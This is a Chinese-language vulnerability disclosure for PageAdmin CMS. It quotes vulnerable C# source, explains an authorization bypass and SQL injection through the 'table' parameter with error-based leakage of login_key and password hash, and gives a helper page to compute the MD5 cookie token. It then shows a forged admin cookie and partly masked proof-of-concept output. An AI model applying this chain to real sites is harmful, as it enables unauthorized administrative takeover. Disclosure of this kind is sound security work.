PageAdmin CMS最新版SQL注入（官方DEMO测试）

#1 一个越权 /e/master/build_static.aspx

code 区域

protected void Page_Load(Object src,EventArgs e)    {      Ids=Request.QueryString["ids"];      Table=Request.QueryString["table"];      Conn Myconn=new Conn();      conn=Myconn.OleDbConn();//获取OleDbConnection      switch(Table)       {         case "pa_zt":           Build_Lanmu();         break;           case "pa_zt_sublanmu":           Build_SubLanmu();         break;           case "pa_lanmu":           Build_Lanmu();         break;           case "pa_sublanmu":           Build_SubLanmu();         break;           default:          Build_Detail();         break;       }    }

#2 注入点

code 区域

private void Build_Detail()   {      conn.Open();      if(Ids!=null && IsNum(Ids.Replace(",","")))       {         Build_Html BH=new Build_Html();           if(IsNum(Ids))          {           sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id="+Ids;          }         else          {           sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id in("+Ids+")";          }         OleDbCommand comm=new OleDbCommand(sql,conn);         OleDbDataReader dr=comm.ExecuteReader();         while(dr.Read())           {              try             {              BH.Build_Detail(dr["site_dir"].ToString(),dr["static_dir"].ToString(),dr["static_file"].ToString(),dr["lanmu_id"].ToString(),dr["sublanmu_id"].ToString(),dr["id"].ToString());             }            catch(Exception e)            {              LocalUrl="http://"+Request.ServerVariables["SERVER_NAME"]+":"+Request.ServerVariables["SERVER_PORT"];              SiteDir=dr["site_dir"].ToString();              SiteDir=(SiteDir==""?"/":("/"+SiteDir+"/"));              ErrorUrl=LocalUrl+SiteDir+"index.aspx?lanmuid="+dr["lanmu_id"].ToString()+"&sublanmuid="+dr["sublanmu_id"].ToString()+"&id="+dr["id"].ToString();              Response.Write(ErrorUrl+"生成失败："+e.Message);              Response.End();              break;            }          }        dr.Close();        conn.Close();        Response.Write("success");        Response.End();       }      Response.Write("Invalid Ids");      Response.End();   }

其中Table参数可构造：

code 区域

sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id="+Ids;

且会产生错误回显：

code 区域

ErrorUrl=LocalUrl+SiteDir+"index.aspx?lanmuid="+dr["lanmu_id"].ToString()+"&sublanmuid="+dr["sublanmu_id"].ToString()+"&id="+dr["id"].ToString();  Response.Write(ErrorUrl+"生成失败："+e.Message);

#3 构造请求可得到login_key（见POC），鉴权cookie中的valicate由以下代码生成，且LoginKey被存入数据库login_key字段：

code 区域

string LoginKey=Guid.NewGuid().ToString("N")+LoginDate.AddSeconds(r.Next(1,2592000)).ToString("yyMMddHHmmss");       Md5 Jm=new Md5();       HttpCookie MCookie=new HttpCookie("Member");       MCookie.Values.Add("UID",UID);       MCookie.Values.Add("Valicate",Jm.Get_Md5(LoginKey));       Response.AppendCookie(MCookie);        Update_Member(UID,LoginDate,LoginKey);

#4 利用本地pageadmin环境进行login_key的加密：

code 区域

新建test.aspx<% @ Import NameSpace="System.Data.OleDb"%>  <% @ Import NameSpace="PageAdmin"%>  <script Language="C#" Runat="server">  protected void Page_Load(Object sender,EventArgs e)  {  string loginkey=Request.QueryString["loginkey"];  Response.Write(new Md5().Get_Md5(loginkey));  }  </script>

#5伪造cookie即可进入后台

code 区域

**.**.**.** FALSE / FALSE Master UID=2&Valicate=abd2128c766f990f7b4ec19c137e452117db  **.**.**.** FALSE / ALSE SiteId 1

#1使用poc获取报错

code 区域

http://**.**.**.**:80/2/index.aspx?lanmuid=bae915239122142b5101e319cf516ef3e371121&sublanmuid=f3fac35c66184f9281b221fa41ddbf59_160123191804&id=2生成失败：The remote server returned an error: (404) Not Found.

其中sublanmuid的值为login_key，lanmuid的值为密码

#2得到加密后的valicate

abd2128c766f990f7b4ec19c137e452117db

#3伪造cookie进入后台

#1 页面鉴权

#2 sql_format